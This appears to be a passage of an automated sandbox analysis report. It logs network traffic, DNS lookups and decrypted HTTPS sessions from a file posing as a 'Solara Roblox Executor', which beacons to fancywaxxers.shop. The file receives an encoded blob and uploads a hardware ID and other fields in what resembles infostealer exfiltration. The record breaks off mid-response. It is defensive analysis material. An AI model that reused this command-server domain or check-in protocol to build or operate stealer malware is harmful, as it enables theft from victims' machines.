Dec 31, 2024 17:23:15.336997986 CET	443	49710	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:15.337203026 CET	49710	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:15.339087009 CET	49710	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:15.339097023 CET	443	49710	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:15.339333057 CET	443	49710	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:15.384015083 CET	49710	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:15.390537024 CET	49710	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:15.391273022 CET	49710	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:15.391308069 CET	443	49710	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:15.392070055 CET	49710	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:15.392107010 CET	443	49710	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:15.392915010 CET	49710	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:15.392951012 CET	443	49710	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:15.393071890 CET	49710	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:15.393110037 CET	443	49710	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:15.393588066 CET	49710	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:15.393623114 CET	443	49710	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:15.393779039 CET	49710	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:15.393801928 CET	443	49710	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:15.393811941 CET	49710	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:15.393825054 CET	443	49710	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:15.393999100 CET	49710	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:15.394025087 CET	443	49710	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:15.394043922 CET	49710	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:15.394280910 CET	49710	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:15.394309044 CET	49710	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:15.402010918 CET	443	49710	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:15.402168989 CET	49710	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:15.402201891 CET	443	49710	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:15.402205944 CET	49710	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:15.402226925 CET	443	49710	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:15.402241945 CET	49710	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:15.402277946 CET	49710	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:15.406722069 CET	443	49710	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:17.996165037 CET	443	49710	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:17.996280909 CET	443	49710	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:17.996340990 CET	49710	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:17.996503115 CET	49710	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:17.996526003 CET	443	49710	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:18.030714035 CET	49711	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:18.030755997 CET	443	49711	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:18.030965090 CET	49711	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:18.031116009 CET	49711	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:18.031128883 CET	443	49711	104.21.96.1	192.168.2.5
Dec 31, 2024 17:23:18.415375948 CET	49711	443	192.168.2.5	104.21.96.1
Dec 31, 2024 17:23:25.314273119 CET	52375	53	192.168.2.5	1.1.1.1
Dec 31, 2024 17:23:25.320036888 CET	53	52375	1.1.1.1	192.168.2.5
Dec 31, 2024 17:23:25.320125103 CET	52375	53	192.168.2.5	1.1.1.1
Dec 31, 2024 17:23:25.324908972 CET	53	52375	1.1.1.1	192.168.2.5
Dec 31, 2024 17:23:25.792817116 CET	52375	53	192.168.2.5	1.1.1.1
Dec 31, 2024 17:23:25.799599886 CET	53	52375	1.1.1.1	192.168.2.5
Dec 31, 2024 17:23:25.799662113 CET	52375	53	192.168.2.5	1.1.1.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 17:23:06.437135935 CET	57343	53	192.168.2.5	1.1.1.1
Dec 31, 2024 17:23:06.451248884 CET	53	57343	1.1.1.1	192.168.2.5
Dec 31, 2024 17:23:25.312870026 CET	53	65181	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 31, 2024 17:23:06.437135935 CET	192.168.2.5	1.1.1.1	0xe903	Standard query (0)	fancywaxxers.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 31, 2024 17:23:06.451248884 CET	1.1.1.1	192.168.2.5	0xe903	No error (0)	fancywaxxers.shop		104.21.96.1	A (IP address)	IN (0x0001)	false
Dec 31, 2024 17:23:06.451248884 CET	1.1.1.1	192.168.2.5	0xe903	No error (0)	fancywaxxers.shop		104.21.64.1	A (IP address)	IN (0x0001)	false
Dec 31, 2024 17:23:06.451248884 CET	1.1.1.1	192.168.2.5	0xe903	No error (0)	fancywaxxers.shop		104.21.32.1	A (IP address)	IN (0x0001)	false
Dec 31, 2024 17:23:06.451248884 CET	1.1.1.1	192.168.2.5	0xe903	No error (0)	fancywaxxers.shop		104.21.48.1	A (IP address)	IN (0x0001)	false
Dec 31, 2024 17:23:06.451248884 CET	1.1.1.1	192.168.2.5	0xe903	No error (0)	fancywaxxers.shop		104.21.112.1	A (IP address)	IN (0x0001)	false
Dec 31, 2024 17:23:06.451248884 CET	1.1.1.1	192.168.2.5	0xe903	No error (0)	fancywaxxers.shop		104.21.16.1	A (IP address)	IN (0x0001)	false
Dec 31, 2024 17:23:06.451248884 CET	1.1.1.1	192.168.2.5	0xe903	No error (0)	fancywaxxers.shop		104.21.80.1	A (IP address)	IN (0x0001)	false
Dec 31, 2024 17:23:24.831779957 CET	1.1.1.1	192.168.2.5	0xac6e	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 31, 2024 17:23:24.831779957 CET	1.1.1.1	192.168.2.5	0xac6e	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

fancywaxxers.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	104.21.96.1	443	2828	C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:23:07 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: fancywaxxers.shop
2024-12-31 16:23:07 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-31 16:23:07 UTC	1131	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:23:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jav00dhc6m6vu4op8u4b8me3ir; expires=Sat, 26 Apr 2025 10:09:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gZK5YPhdS6l85g%2BrZ3UcMg28b5Vceo%2BXXcF%2BweayKv18dHDKtc51RHPPHEJF8TLUiXcLVDvUqq%2BBc3DMu9MM4CUKrNxcliALpixcBpZkmZqJsWF9uJ8IUSbmECrdFuTnYbLKkg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fab9cbdcea34363-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1610&min_rtt=1603&rtt_var=616&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=908&delivery_rate=1756919&cwnd=238&unsent_bytes=0&cid=14af6b13c608d60f&ts=621&x=0"
2024-12-31 16:23:07 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-31 16:23:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	104.21.96.1	443	2828	C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:23:08 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 51 Host: fancywaxxers.shop
2024-12-31 16:23:08 UTC	51	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--899083440&j=
2024-12-31 16:23:08 UTC	1136	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:23:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=p0iauec3bv65keoq65vls8117l; expires=Sat, 26 Apr 2025 10:09:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0PlSpnwi00LuMl7HblCz8kAH0QGTz0JuwJ5dWLIIawczw43j1IpPuZQR9teK2Jas2%2BnkTth7rVl3FhLF0uyCDH%2FHXUPpCWGBCgek%2BcA%2FOO%2F9rq1t%2BEjYt3H%2B1qMQGngPRTAPww%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fab9cc66917c32e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1668&min_rtt=1668&rtt_var=834&sent=5&recv=7&lost=0&retrans=1&sent_bytes=4228&recv_bytes=952&delivery_rate=183278&cwnd=178&unsent_bytes=0&cid=054940e41c4e89f3&ts=598&x=0"
2024-12-31 16:23:08 UTC	233	IN	Data Raw: 31 63 62 33 0d 0a 38 50 55 35 56 4c 7a 53 46 6d 6d 54 41 4f 68 6d 61 34 2f 4a 74 35 53 65 79 2b 73 4c 34 2f 67 4f 4f 30 6f 52 37 38 54 45 2b 4d 6d 4c 31 30 39 32 68 75 59 36 53 2b 42 6c 79 6c 77 66 2f 62 7a 53 75 4c 79 71 6a 79 6e 5a 6e 6d 39 58 4f 58 54 44 35 72 4b 56 36 38 71 54 57 44 6a 50 74 7a 70 4c 39 6e 6a 4b 58 44 44 30 36 39 4c 36 76 50 48 4a 62 6f 6d 61 62 31 63 6f 63 49 53 72 74 4a 53 71 6d 4a 6c 65 50 4e 6d 78 63 67 6a 2f 62 59 30 44 44 75 36 6a 32 66 33 7a 6f 34 59 70 7a 39 70 72 51 57 67 72 7a 59 6d 68 6a 4b 69 39 6c 45 6f 2f 6e 71 38 36 45 72 46 6c 68 6b 52 52 72 61 6a 53 39 76 4b 74 6a 32 43 4c 6b 47 5a 66 4b 58 57 46 74 4b 32 65 6f 5a 69 58 58 54 33 54 75 47 59 46 39 57 71 Data Ascii: 1cb38PU5VLzSFmmTAOhma4/Jt5Sey+sL4/gOO0oR78TE+MmL1092huY6S+Blylwf/bzSuLyqjynZnm9XOXTD5rKV68qTWDjPtzpL9njKXDD069L6vPHJbomab1cocISrtJSqmJlePNmxcgj/bY0DDu6j2f3zo4Ypz9prQWgrzYmhjKi9lEo/nq86ErFlhkRRrajS9vKtj2CLkGZfKXWFtK2eoZiXXT3TuGYF9Wq
2024-12-31 16:23:08 UTC	1369	IN	Data Raw: 47 42 51 54 75 36 35 75 32 2b 37 48 4a 4d 63 48 4a 58 6c 6f 35 59 70 69 72 74 70 7a 72 6a 64 6c 43 64 74 6d 38 4e 46 4f 78 61 6f 59 4b 44 4f 36 6b 30 76 66 38 75 34 5a 70 67 70 4a 6b 58 53 4a 38 67 71 6d 6f 6b 4b 79 61 6e 6c 77 35 32 62 68 79 42 50 49 69 78 45 51 4f 39 65 75 4e 74 74 79 35 69 6d 71 56 6c 33 30 5a 4e 7a 32 55 35 71 47 57 36 38 72 58 58 54 6a 66 76 58 51 5a 2b 57 6d 42 41 52 76 6d 6f 74 6a 37 2f 4b 53 44 5a 6f 4b 61 61 31 4d 69 66 49 65 69 71 35 65 74 6b 70 63 62 65 4a 36 33 62 45 75 70 49 71 6b 42 47 65 71 6e 77 37 54 47 36 5a 59 6e 6d 4e 70 72 56 57 67 72 7a 61 36 6a 6d 61 69 5a 6d 46 67 2b 31 61 4a 30 47 66 64 76 6a 78 59 50 36 4b 58 66 39 65 36 6a 68 32 2b 43 6b 32 64 51 4c 58 53 4a 35 75 6a 61 72 49 72 58 41 33 62 2f 76 58 38 48 2b 33 Data Ascii: GBQTu65u2+7HJMcHJXlo5YpirtpzrjdlCdtm8NFOxaoYKDO6k0vf8u4ZpgpJkXSJ8gqmokKyanlw52bhyBPIixEQO9euNtty5imqVl30ZNz2U5qGW68rXXTjfvXQZ+WmBARvmotj7/KSDZoKaa1MifIeiq5etkpcbeJ63bEupIqkBGeqnw7TG6ZYnmNprVWgrza6jmaiZmFg+1aJ0GfdvjxYP6KXf9e6jh2+Ck2dQLXSJ5ujarIrXA3b/vX8H+3
2024-12-31 16:23:08 UTC	1369	IN	Data Raw: 2f 37 6e 56 2b 75 36 6c 67 32 2b 4f 6c 32 41 5a 5a 6a 4f 4b 76 75 62 43 36 37 69 55 54 7a 58 55 38 6b 45 49 2f 32 79 4e 45 6b 6e 79 35 63 79 32 2b 36 58 4a 4d 63 47 58 62 56 45 75 59 59 4b 72 70 5a 53 6c 6e 5a 4a 55 50 74 36 77 65 51 37 31 61 59 45 48 42 4f 6d 35 33 2f 62 30 72 49 68 6a 69 39 6f 69 47 53 39 72 7a 66 37 6d 71 37 79 5a 31 57 34 31 30 4c 35 7a 48 62 46 39 78 42 31 4a 36 71 65 56 72 72 79 6b 67 57 79 45 6c 57 31 54 4a 6e 61 48 71 71 36 55 71 49 43 59 58 7a 62 53 75 48 34 47 2f 32 61 43 44 51 4c 6d 72 64 58 33 39 75 6e 48 4b 59 61 43 4c 41 46 6f 52 34 71 71 71 35 58 70 70 35 52 56 4f 4e 6d 6d 4e 42 53 2f 65 38 6f 44 42 61 33 7a 6c 66 72 31 71 59 4a 6a 68 5a 70 72 56 43 31 77 69 71 57 72 6e 61 47 63 6b 46 38 36 31 37 31 79 43 2f 5a 6d 6a 78 59 Data Ascii: /7nV+u6lg2+Ol2AZZjOKvubC67iUTzXU8kEI/2yNEkny5cy2+6XJMcGXbVEuYYKrpZSlnZJUPt6weQ71aYEHBOm53/b0rIhji9oiGS9rzf7mq7yZ1W410L5zHbF9xB1J6qeVrrykgWyElW1TJnaHqq6UqICYXzbSuH4G/2aCDQLmrdX39unHKYaCLAFoR4qqq5Xpp5RVONmmNBS/e8oDBa3zlfr1qYJjhZprVC1wiqWrnaGckF86171yC/ZmjxY
2024-12-31 16:23:08 UTC	1369	IN	Data Raw: 66 33 4a 70 35 38 70 6e 74 52 31 47 53 39 2f 7a 66 37 6d 6b 36 4b 41 6d 56 55 2f 30 37 5a 38 44 50 39 76 67 51 49 43 36 71 7a 54 2b 2f 53 6b 6a 47 71 41 6e 6d 5a 4c 4b 33 69 48 71 36 7a 61 35 64 4b 51 51 33 61 47 38 46 4d 48 32 48 4b 52 46 68 2b 74 74 4a 76 76 76 4b 36 46 4b 64 6e 61 62 31 59 68 66 49 57 75 71 5a 57 76 6e 4a 46 64 4f 39 75 2f 66 68 6e 35 62 49 63 50 42 75 61 35 31 66 76 34 70 59 31 68 69 70 41 73 46 32 68 30 6c 65 62 2b 32 70 36 66 6d 46 73 31 79 50 42 72 52 65 67 69 6a 51 68 4a 74 65 76 5a 2b 50 79 6d 68 57 57 4b 6b 6d 31 56 4a 6e 53 49 72 36 36 53 75 5a 4f 54 55 7a 66 51 76 33 55 50 39 47 65 4f 41 77 33 72 70 4a 57 34 76 4b 36 52 4b 64 6e 61 51 33 34 64 4d 61 79 63 35 6f 58 6c 69 39 64 63 4f 70 37 6f 4e 41 66 79 62 6f 49 4c 44 2b 53 6e Data Ascii: f3Jp58pntR1GS9/zf7mk6KAmVU/07Z8DP9vgQIC6qzT+/SkjGqAnmZLK3iHq6za5dKQQ3aG8FMH2HKRFh+ttJvvvK6FKdnab1YhfIWuqZWvnJFdO9u/fhn5bIcPBua51fv4pY1hipAsF2h0leb+2p6fmFs1yPBrRegijQhJtevZ+PymhWWKkm1VJnSIr66SuZOTUzfQv3UP9GeOAw3rpJW4vK6RKdnaQ34dMayc5oXli9dcOp7oNAfyboILD+Sn
2024-12-31 16:23:08 UTC	1369	IN	Data Raw: 6d 44 59 6f 57 5a 61 46 77 6e 63 6f 79 67 74 4a 32 69 67 4a 6c 57 4f 64 61 34 66 51 72 31 5a 34 63 43 42 65 65 71 30 76 6a 79 6f 63 6b 6e 77 5a 31 30 47 58 41 7a 72 4c 61 39 69 4c 32 66 74 6c 59 35 6e 71 38 36 45 72 46 6c 68 6b 52 52 72 61 4c 48 38 76 47 37 67 47 36 50 6c 57 39 4c 4b 58 36 47 74 4b 47 56 72 35 57 62 58 54 6e 59 73 58 45 42 2f 57 57 50 44 77 62 68 36 35 75 32 2b 37 48 4a 4d 63 47 30 5a 30 6f 2f 63 49 4f 74 73 49 48 72 6a 64 6c 43 64 74 6d 38 4e 46 4f 78 59 59 45 50 44 65 32 6e 31 66 4c 78 71 5a 74 6d 68 70 31 6c 55 6a 70 35 69 71 47 74 6b 71 43 64 6b 55 6b 36 30 4b 4a 78 47 65 4d 69 78 45 51 4f 39 65 75 4e 74 73 71 75 6d 58 6d 43 32 46 31 50 4b 32 57 47 71 36 72 61 74 4e 79 4f 47 7a 48 53 38 43 78 4c 39 32 32 44 42 77 62 73 6f 74 6e 37 2b Data Ascii: mDYoWZaFwncoygtJ2igJlWOda4fQr1Z4cCBeeq0vjyocknwZ10GXAzrLa9iL2ftlY5nq86ErFlhkRRraLH8vG7gG6PlW9LKX6GtKGVr5WbXTnYsXEB/WWPDwbh65u2+7HJMcG0Z0o/cIOtsIHrjdlCdtm8NFOxYYEPDe2n1fLxqZtmhp1lUjp5iqGtkqCdkUk60KJxGeMixEQO9euNtsqumXmC2F1PK2WGq6ratNyOGzHS8CxL922DBwbsotn7+
2024-12-31 16:23:08 UTC	1369	IN	Data Raw: 42 6f 6d 64 58 47 6e 43 57 35 72 6e 55 73 74 4b 51 56 33 61 47 38 48 63 4d 38 6d 4f 41 44 51 58 69 72 4e 48 6b 39 71 36 62 61 49 43 52 59 56 55 6f 66 6f 43 73 70 35 4f 6d 6e 70 70 63 4d 64 47 31 4e 45 57 78 5a 5a 4a 45 55 61 32 4b 32 50 33 77 38 74 4d 70 6e 74 52 31 47 53 39 2f 7a 66 37 6d 6d 71 47 58 6e 56 59 31 30 62 4e 6d 43 76 64 77 69 67 6b 44 2f 36 48 65 38 2f 47 6b 68 47 71 48 6e 47 64 56 4f 6e 71 4e 70 61 33 61 35 64 4b 51 51 33 61 47 38 46 63 63 35 32 69 4e 43 42 2f 6d 71 74 62 67 38 62 6e 4a 4a 38 47 4c 61 30 68 6f 4b 35 75 32 73 5a 32 30 33 49 34 62 4d 64 4c 77 4c 45 76 33 61 34 77 44 44 2b 4f 35 30 50 44 7a 70 6f 42 67 68 5a 4a 76 57 53 78 33 69 71 4f 6c 6c 71 43 56 6c 46 51 79 31 37 35 39 42 4c 45 73 79 67 4d 52 72 66 4f 56 31 2b 65 71 68 57 Data Ascii: BomdXGnCW5rnUstKQV3aG8HcM8mOADQXirNHk9q6baICRYVUofoCsp5OmnppcMdG1NEWxZZJEUa2K2P3w8tMpntR1GS9/zf7mmqGXnVY10bNmCvdwigkD/6He8/GkhGqHnGdVOnqNpa3a5dKQQ3aG8Fcc52iNCB/mqtbg8bnJJ8GLa0hoK5u2sZ203I4bMdLwLEv3a4wDD+O50PDzpoBghZJvWSx3iqOllqCVlFQy1759BLEsygMRrfOV1+eqhW
2024-12-31 16:23:08 UTC	277	IN	Data Raw: 57 69 45 7a 77 2b 61 68 67 75 76 4b 31 33 73 39 79 4c 56 7a 48 62 4e 58 69 51 6f 48 36 72 32 56 36 63 50 6e 79 57 61 62 32 6a 52 67 4d 54 4f 4b 71 75 62 43 36 34 65 51 57 7a 48 45 70 6e 4d 48 34 47 6d 48 43 43 76 69 72 4d 50 31 38 36 71 59 59 4d 32 52 59 52 6c 6d 4d 34 71 2b 35 73 4c 72 76 5a 42 4e 4e 66 47 7a 5a 51 4b 78 4c 4d 6f 44 48 36 33 7a 6c 63 69 38 75 34 70 35 67 70 56 39 5a 32 67 72 6c 4a 6a 6d 6b 62 32 56 68 31 67 67 31 62 31 34 47 73 38 69 30 6c 42 62 76 2f 6d 48 70 4f 50 70 6c 6c 62 50 32 6d 30 5a 63 45 71 55 35 72 44 61 38 38 44 5a 47 79 53 65 36 44 52 4d 38 6e 43 59 41 67 72 37 71 4a 4c 49 77 6f 36 66 59 34 61 4b 61 30 34 6e 4d 38 50 6d 71 64 72 7a 71 39 64 53 4d 63 57 68 59 67 62 68 5a 63 6f 37 52 36 32 7a 6c 61 36 38 6e 49 70 6e 6a 35 31 Data Ascii: WiEzw+ahguvK13s9yLVzHbNXiQoH6r2V6cPnyWab2jRgMTOKqubC64eQWzHEpnMH4GmHCCvirMP186qYYM2RYRlmM4q+5sLrvZBNNfGzZQKxLMoDH63zlci8u4p5gpV9Z2grlJjmkb2Vh1gg1b14Gs8i0lBbv/mHpOPpllbP2m0ZcEqU5rDa88DZGySe6DRM8nCYAgr7qJLIwo6fY4aKa04nM8Pmqdrzq9dSMcWhYgbhZco7R62zla68nIpnj51
2024-12-31 16:23:08 UTC	1369	IN	Data Raw: 32 63 65 31 0d 0a 30 55 36 49 73 79 67 41 59 72 66 4f 46 70 4b 66 38 32 6a 37 52 79 48 4d 58 4d 54 4f 62 35 76 37 49 35 64 4b 46 47 32 36 65 39 33 63 5a 34 32 53 4a 45 67 71 71 6c 65 76 52 35 71 53 50 66 70 43 6b 55 6c 34 79 66 6f 75 78 74 39 61 2b 6b 5a 6c 56 4d 63 6a 77 4f 6b 76 2b 49 74 49 39 53 61 58 72 36 72 69 38 73 63 6b 78 77 61 39 76 56 79 5a 30 6d 37 66 72 76 62 47 66 6b 55 77 6e 6e 76 34 30 44 62 45 36 32 45 70 4a 36 62 71 56 72 71 7a 37 30 6a 7a 53 7a 54 77 4c 4e 7a 32 55 35 72 44 61 38 38 44 5a 47 79 53 65 36 44 52 4d 38 6e 43 59 41 67 72 37 71 4a 4c 49 77 6f 65 4f 62 34 53 64 66 42 73 47 65 4a 6d 68 35 74 54 72 6e 64 63 44 44 35 37 34 4e 44 53 2f 49 70 4a 45 55 61 32 65 31 76 6a 79 72 70 39 34 7a 4c 52 72 58 79 31 30 6e 65 53 49 6b 62 2b 56 Data Ascii: 2ce10U6IsygAYrfOFpKf82j7RyHMXMTOb5v7I5dKFG26e93cZ42SJEgqqlevR5qSPfpCkUl4yfouxt9a+kZlVMcjwOkv+ItI9SaXr6ri8sckxwa9vVyZ0m7frvbGfkUwnnv40DbE62EpJ6bqVrqz70jzSzTwLNz2U5rDa88DZGySe6DRM8nCYAgr7qJLIwoeOb4SdfBsGeJmh5tTrndcDD574NDS/IpJEUa2e1vjyrp94zLRrXy10neSIkb+V
2024-12-31 16:23:08 UTC	1369	IN	Data Raw: 79 69 63 67 6a 6e 59 63 30 36 4e 38 71 6c 30 76 66 71 75 5a 35 6d 76 36 52 35 57 69 5a 39 69 72 43 33 32 75 58 53 6d 42 74 75 35 2f 41 38 53 38 34 73 79 68 78 4a 74 65 76 67 39 66 4b 6e 6a 6e 2b 51 31 30 74 58 4c 33 4b 62 74 72 47 56 36 39 7a 58 58 58 61 47 34 6a 70 4c 39 58 50 4b 58 46 6d 2f 38 49 43 6c 71 2f 6e 62 64 73 2b 44 4c 45 39 6f 4b 39 2f 6f 35 6f 6a 72 79 74 63 63 4e 63 79 69 63 67 6a 6e 59 63 30 36 4e 38 71 6c 30 76 66 71 75 5a 35 6d 7a 72 52 61 65 42 5a 4e 6d 4b 57 6f 6c 4b 79 45 68 68 74 34 6e 72 38 30 55 38 67 69 77 6b 51 32 6f 2b 76 4e 74 71 54 70 76 47 71 50 6c 47 74 50 4f 54 36 71 71 4b 47 62 76 59 4b 41 56 48 6e 77 68 6c 56 4c 76 79 4b 4d 52 46 47 2f 35 5a 58 79 37 65 6e 52 4f 64 50 42 4f 51 70 2f 49 39 2b 35 36 49 50 72 68 4e 63 44 5a Data Ascii: yicgjnYc06N8ql0vfquZ5mv6R5WiZ9irC32uXSmBtu5/A8S84syhxJtevg9fKnjn+Q10tXL3KbtrGV69zXXXaG4jpL9XPKXFm/8IClq/nbds+DLE9oK9/o5ojrytccNcyicgjnYc06N8ql0vfquZ5mzrRaeBZNmKWolKyEhht4nr80U8giwkQ2o+vNtqTpvGqPlGtPOT6qqKGbvYKAVHnwhlVLvyKMRFG/5ZXy7enROdPBOQp/I9+56IPrhNcDZ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49706	104.21.96.1	443	2828	C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:23:09 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=2EKJAD3T7WDXL User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12809 Host: fancywaxxers.shop
2024-12-31 16:23:09 UTC	12809	OUT	Data Raw: 2d 2d 32 45 4b 4a 41 44 33 54 37 57 44 58 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 30 41 43 37 33 32 39 30 38 37 41 39 32 44 32 45 45 39 30 36 35 46 32 44 36 31 32 45 42 30 43 0d 0a 2d 2d 32 45 4b 4a 41 44 33 54 37 57 44 58 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 45 4b 4a 41 44 33 54 37 57 44 58 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 0d 0a 2d 2d 32 45 4b 4a 41 44 33 Data Ascii: --2EKJAD3T7WDXLContent-Disposition: form-data; name="hwid"C0AC7329087A92D2EE9065F2D612EB0C--2EKJAD3T7WDXLContent-Disposition: form-data; name="pid"2--2EKJAD3T7WDXLContent-Disposition: form-data; name="lid"yau6Na--899083440--2EKJAD3
2024-12-31 16:23:10 UTC	1138	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:23:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=b04jk6csrvo4v5n1s09fq179v4; expires=Sat, 26 Apr 2025 10:09:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: 